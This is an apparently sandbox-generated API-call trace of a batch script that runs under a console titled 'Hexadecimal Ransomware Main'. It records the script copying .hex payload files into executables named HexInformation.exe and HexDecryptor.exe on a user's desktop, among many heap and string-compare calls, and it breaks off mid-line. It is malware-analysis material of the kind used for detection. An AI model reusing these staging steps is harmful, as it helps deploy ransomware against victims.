_wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0108.833] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0108.833] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c32f0) returned 1 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c5eb0 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c5eb0, Size=0x7c) returned 0x1dc256c0d30 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c0d30) returned 0x7c [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bef00 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256bc4a0 [0108.834] _wcsicmp (_String1="HexIF.hex", _String2=".") returned 58 [0108.834] _wcsicmp (_String1="HexIF.hex", _String2="..") returned 58 [0108.834] GetFileAttributesW (lpFileName="HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex")) returned 0x20 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bef60 [0108.834] GetProcessHeap () returned 0x1dc256b0000 [0108.834] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be260 [0108.835] _wcsicmp (_String1="HexInformation.exe", _String2=".") returned 58 [0108.835] _wcsicmp (_String1="HexInformation.exe", _String2="..") returned 58 [0108.835] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x407419e9fc, ReturnLength=0x0) returned 0x0 [0108.835] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9f8, ProcessInformationLength=0x4) returned 0x0 [0108.835] malloc (_Size=0xffce) returned 0x1dc25800120 [0108.836] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0108.837] malloc (_Size=0xffce) returned 0x1dc25810100 [0108.837] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0108.838] malloc (_Size=0xffce) returned 0x1dc258200e0 [0108.838] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0108.838] malloc (_Size=0x1ff9c) returned 0x1dc258300c0 [0108.839] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0108.840] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1dc25610000 [0108.840] FindFirstFileExW (in: lpFileName="HexIF.hex", fInfoLevelId=0x1, lpFindFileData=0x1dc256bc4b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dc256bc4b0) returned 0x1dc256bed20 [0108.840] malloc (_Size=0xffce) returned 0x1dc25850070 [0108.840] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0108.841] malloc (_Size=0xffce) returned 0x1dc25860050 [0108.841] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0108.842] ??_V@YAXPEAX@Z () returned 0x1 [0108.842] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", lpFilePart=0x0) returned 0x2a [0108.842] ??_V@YAXPEAX@Z () returned 0x1 [0108.843] _wcsicmp (_String1="HexIF.hex", _String2="con") returned 5 [0108.843] CreateFileW (lpFileName="HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419e000, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x9c [0108.843] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0108.844] _get_osfhandle (_FileHandle=3) returned 0x9c [0108.844] GetFileType (hFile=0x9c) returned 0x1 [0108.844] SetErrorMode (uMode=0x0) returned 0x0 [0108.844] SetErrorMode (uMode=0x1) returned 0x0 [0108.844] GetFullPathNameW (in: lpFileName="HexIF.hex", nBufferLength=0xffce, lpBuffer=0x1dc258300c0, lpFilePart=0x407419e050 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", lpFilePart=0x407419e050*="HexIF.hex") returned 0x21 [0108.844] SetErrorMode (uMode=0x0) returned 0x1 [0108.844] _get_osfhandle (_FileHandle=3) returned 0x9c [0108.844] ReadFile (in: hFile=0x9c, lpBuffer=0x1dc25610000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x407419e084, lpOverlapped=0x0 | out: lpBuffer=0x1dc25610000*, lpNumberOfBytesRead=0x407419e084*=0x200, lpOverlapped=0x0) returned 1 [0108.845] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0108.846] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0108.847] SetErrorMode (uMode=0x0) returned 0x0 [0108.847] SetErrorMode (uMode=0x1) returned 0x0 [0108.847] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", lpFilePart=0x407419dde0*="HexInformation.exe") returned 0x2a [0108.847] SetErrorMode (uMode=0x0) returned 0x1 [0108.847] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe") returned -8 [0108.847] ??_V@YAXPEAX@Z () returned 0x1 [0108.848] GetProcessHeap () returned 0x1dc256b0000 [0108.848] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be4d0 [0108.848] _wcsicmp (_String1="HexInformation.exe", _String2=".") returned 58 [0108.848] _wcsicmp (_String1="HexInformation.exe", _String2="..") returned 58 [0108.848] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0xffffffff [0108.848] GetLastError () returned 0x2 [0108.848] malloc (_Size=0xffce) returned 0x1dc25850070 [0108.849] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0108.849] malloc (_Size=0xffce) returned 0x1dc25860050 [0108.849] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0108.850] ??_V@YAXPEAX@Z () returned 0x1 [0108.850] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", lpFilePart=0x0) returned 0x2a [0108.851] ??_V@YAXPEAX@Z () returned 0x1 [0108.851] malloc (_Size=0x1ff9c) returned 0x1dc25850070 [0108.852] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0108.853] SetErrorMode (uMode=0x0) returned 0x0 [0108.853] SetErrorMode (uMode=0x1) returned 0x0 [0108.853] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", nBufferLength=0xffce, lpBuffer=0x1dc25850070, lpFilePart=0x407419dde0 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", lpFilePart=0x407419dde0*="HexInformation.exe") returned 0x2a [0108.853] SetErrorMode (uMode=0x0) returned 0x1 [0108.853] _wcsicmp (_String1="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", _String2="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe") returned -8 [0108.853] ??_V@YAXPEAX@Z () returned 0x1 [0108.854] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0xffffffff [0108.854] CopyFileExW (lpExistingFileName="HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex"), lpNewFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x7ff67b909834, dwCopyFlags=0x0) returned 1 [0109.012] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe")) returned 0x20 [0109.012] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop\\HexInformation.exe", dwFileAttributes=0x20) returned 1 [0109.012] _close (_FileHandle=3) returned 0 [0109.012] FindNextFileW (in: hFindFile=0x1dc256bed20, lpFindFileData=0x1dc256bc4b0 | out: lpFindFileData=0x1dc256bc4b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cb3f4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3cb3f4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexIF.hex", cAlternateFileName="")) returned 0 [0109.012] GetLastError () returned 0x12 [0109.012] FindClose (in: hFindFile=0x1dc256bed20 | out: hFindFile=0x1dc256bed20) returned 1 [0109.012] ??_V@YAXPEAX@Z () returned 0x1 [0109.014] ??_V@YAXPEAX@Z () returned 0x1 [0109.016] ??_V@YAXPEAX@Z () returned 0x1 [0109.019] ??_V@YAXPEAX@Z () returned 0x1 [0109.022] _vsnwprintf (in: _Buffer=0x7ff67b920310, _BufferCount=0x103, _Format="%9d", _ArgList=0x407419e9d8 | out: _Buffer=" 1") returned 9 [0109.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.022] GetFileType (hFile=0x50) returned 0x2 [0109.022] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0109.022] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x407419e8c8 | out: lpMode=0x407419e8c8) returned 1 [0109.027] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.027] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x50, lpConsoleScreenBufferInfo=0x407419e900 | out: lpConsoleScreenBufferInfo=0x407419e900) returned 1 [0109.028] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) copied.\r\n") returned 0x14 [0109.028] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x7ff67b917f60, nSize=0x2000, Arguments=0x407419e9a0 | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0109.028] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff67b917f60*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x407419e8f0, lpReserved=0x0 | out: lpBuffer=0x7ff67b917f60*, lpNumberOfCharsWritten=0x407419e8f0*=0x1b) returned 1 [0109.032] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4) returned 0x0 [0109.032] ??_V@YAXPEAX@Z () returned 0x1 [0109.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.064] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0109.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0109.066] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0109.283] _get_osfhandle (_FileHandle=0) returned 0x4c [0109.283] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0109.368] SetConsoleInputExeNameW () returned 0x1 [0109.369] GetConsoleOutputCP () returned 0x1b5 [0109.445] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0109.445] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.541] ??_V@YAXPEAX@Z () returned 0x1 [0109.545] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0109.545] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0109.545] _get_osfhandle (_FileHandle=3) returned 0xa0 [0109.545] SetFilePointer (in: hFile=0xa0, lDistanceToMove=244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be4d0) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bef60) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bef00) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0d30) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf0e0) returned 1 [0109.545] GetProcessHeap () returned 0x1dc256b0000 [0109.545] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bee40) returned 1 [0109.546] GetProcessHeap () returned 0x1dc256b0000 [0109.546] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c13f0) returned 1 [0109.546] GetProcessHeap () returned 0x1dc256b0000 [0109.546] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcea0) returned 1 [0109.546] GetProcessHeap () returned 0x1dc256b0000 [0109.546] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c1750) returned 1 [0109.546] GetProcessHeap () returned 0x1dc256b0000 [0109.546] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3380) returned 1 [0109.546] GetProcessHeap () returned 0x1dc256b0000 [0109.546] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0109.546] VirtualFree (lpAddress=0x1dc25610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.546] _get_osfhandle (_FileHandle=3) returned 0xa0 [0109.546] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf4 [0109.546] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0xf5, lpOverlapped=0x0) returned 1 [0109.546] SetFilePointer (in: hFile=0xa0, lDistanceToMove=307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x133 [0109.546] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=63, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="copy HexDCIF.hex C:\\Users\\%username%\\desktop\\HexDecryptor.exe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 63 [0109.547] _get_osfhandle (_FileHandle=3) returned 0xa0 [0109.547] GetFileType (hFile=0xa0) returned 0x1 [0109.547] _get_osfhandle (_FileHandle=3) returned 0xa0 [0109.547] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x133 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d86c0 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256dc6e0 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x22) returned 0x1dc256c3230 [0109.547] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3230) returned 1 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256dc6e0) returned 1 [0109.547] GetProcessHeap () returned 0x1dc256b0000 [0109.547] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0109.550] _wcsicmp (_String1="copy", _String2=")") returned 58 [0109.551] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0109.551] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0109.551] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0109.551] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0109.551] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0109.552] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0109.552] GetProcessHeap () returned 0x1dc256b0000 [0109.552] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0109.552] GetProcessHeap () returned 0x1dc256b0000 [0109.552] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256c3110 [0109.553] GetProcessHeap () returned 0x1dc256b0000 [0109.553] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x7c) returned 0x1dc256c0ee0 [0109.553] _tell (_FileHandle=3) returned 307 [0109.553] _close (_FileHandle=3) returned 0 [0109.554] malloc (_Size=0xffce) returned 0x1dc257e0160 [0109.556] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0109.556] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0109.556] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0109.556] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0109.556] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0109.556] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0109.556] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0109.670] malloc (_Size=0xffce) returned 0x1dc257f0140 [0109.670] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0109.671] malloc (_Size=0xffce) returned 0x1dc25800120 [0109.671] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0109.672] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0109.672] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0109.672] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0109.672] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0109.672] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0109.672] ??_V@YAXPEAX@Z () returned 0x1 [0109.674] GetProcessHeap () returned 0x1dc256b0000 [0109.674] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c5dc0 [0109.674] GetProcessHeap () returned 0x1dc256b0000 [0109.674] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c5dc0, Size=0x7c) returned 0x1dc256c0a60 [0109.674] GetProcessHeap () returned 0x1dc256b0000 [0109.674] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c0a60) returned 0x7c [0109.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.674] GetProcessHeap () returned 0x1dc256b0000 [0109.674] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x86) returned 0x1dc256c1750 [0109.674] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0109.674] GetProcessHeap () returned 0x1dc256b0000 [0109.675] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bec00 [0109.675] GetProcessHeap () returned 0x1dc256b0000 [0109.675] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bed20 [0109.675] GetProcessHeap () returned 0x1dc256b0000 [0109.675] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c33b0 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.675] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.676] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.677] GetProcessHeap () returned 0x1dc256b0000 [0109.677] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c33b0) returned 1 [0109.677] GetProcessHeap () returned 0x1dc256b0000 [0109.677] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256c3200 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.677] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0109.678] 